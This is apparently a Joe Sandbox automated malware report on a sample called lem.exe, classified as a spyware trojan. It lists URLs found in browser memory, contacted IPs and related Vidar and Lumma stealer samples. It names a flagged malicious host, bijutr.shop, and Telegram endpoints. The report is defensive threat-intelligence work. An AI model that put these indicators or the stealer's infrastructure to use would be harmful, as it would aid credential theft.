                                                                                                                                                                          https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000011.00000002.2695136498.000051D800644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696111849.000051D8008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://docs.google.com/spreadsheets/chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/3078chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/7553chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5375chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/5371chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/4722chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://m.google.com/devicemanagement/data/apichrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602522382.000051D8001C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/7556chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://drive-daily-4.cchrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refInf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://chromewebstore.google.com/chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2937100541.000051040458C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.27.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://www.youtube.com/?feature=ytcaoglchrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://msn.comXIDv10Cookies.28.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://chrome.google.com/webstore/manifest.json.27.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://anglebug.com/6692chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://issuetracker.google.com/258207403msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://docs.google.com/document/doglchrome.exe, 00000011.00000002.2697390661.000051D800C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/%Kchrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://anglebug.com/3502chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          http://anglebug.com/3623msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            http://anglebug.com/3625msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              23.44.201.19
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                                                                              		t.meUnited Kingdom
                                                                                                                                                                                                                                              		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                              162.159.61.3
                                                                                                                                                                                                                                              		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              142.250.181.68
                                                                                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                                              13.89.178.27
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              20.110.205.119
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              188.245.216.205
                                                                                                                                                                                                                                              		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                              		16322PARSONLINETehran-IRANIRtrue
                                                                                                                                                                                                                                              204.79.197.219
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              142.250.181.65
                                                                                                                                                                                                                                              		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                                              172.64.41.3
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              23.209.72.40
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              18.165.220.57
                                                                                                                                                                                                                                              		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                              		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              		unknownReserved
                                                                                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                                                                                              18.164.116.98
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		3MIT-GATEWAYSUSfalse

                                                                                                                                                                                                                                              Private

                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              192.168.2.5
                                                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1581175
                                                                                                                                                                                                                                              Start date and time:2024-12-27 06:59:08 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 8m 8s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:37
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:lem.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@97/306@31/16
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 76
                                                                                                                                                                                                                                              • Number of non-executed functions: 299
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 172.217.21.35, 173.194.220.84, 142.250.181.142, 172.217.17.46, 172.217.19.202, 142.250.181.42, 172.217.17.42, 142.250.181.74, 172.217.17.74, 172.217.19.170, 142.250.181.138, 142.250.181.106, 216.58.208.234, 172.217.19.234, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 172.165.69.228, 2.19.198.56, 23.32.238.138, 2.16.158.90, 2.16.158.83, 2.16.158.91, 2.16.158.48, 2.16.158.96, 2.16.158.50, 2.16.158.88, 2.16.158.75, 2.16.158.82, 2.16.168.113, 2.16.168.122, 2.16.158.33, 2.16.158.40, 2.16.158.35, 95.100.135.248, 95.100.135.178, 95.100.135.160, 95.100.135.243, 2.16.158.170, 2.16.158.179, 2.16.158.169, 2.16.158.184, 13.74.129.1, 13.107.21.237, 204.79.197.237, 23.32.238.163, 142.250.65.163, 142.251.40.195, 142.250.80.67, 4.245.163.56, 13.107.246.63, 184.30.17.174, 94.245.104.56, 20.190.177.82, 4.152.199.46, 13.107.246.40, 20.75.60.91, 104.117.182.18, 23.200.0.6
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, ar
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              00:59:57API Interceptor1x Sleep call for process: lem.exe modified

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              23.44.201.19pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  invoice 700898 for wallcentre.com.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      BraveBrowserSetup-BRV010.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        BraveBrowserSetup-BRV002.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          162.159.61.3HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                      SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                              http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                              http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot

                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              t.mescript.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              chrome.cloudflare-dns.comWRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              bijutr.shopscript.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 188.245.216.205
                                                                                                                                                                                                                                                                              PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 188.245.216.205
                                                                                                                                                                                                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 188.245.216.205
                                                                                                                                                                                                                                                                              ssl.bingadsedgeextension-prod-europe.azurewebsites.netHVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
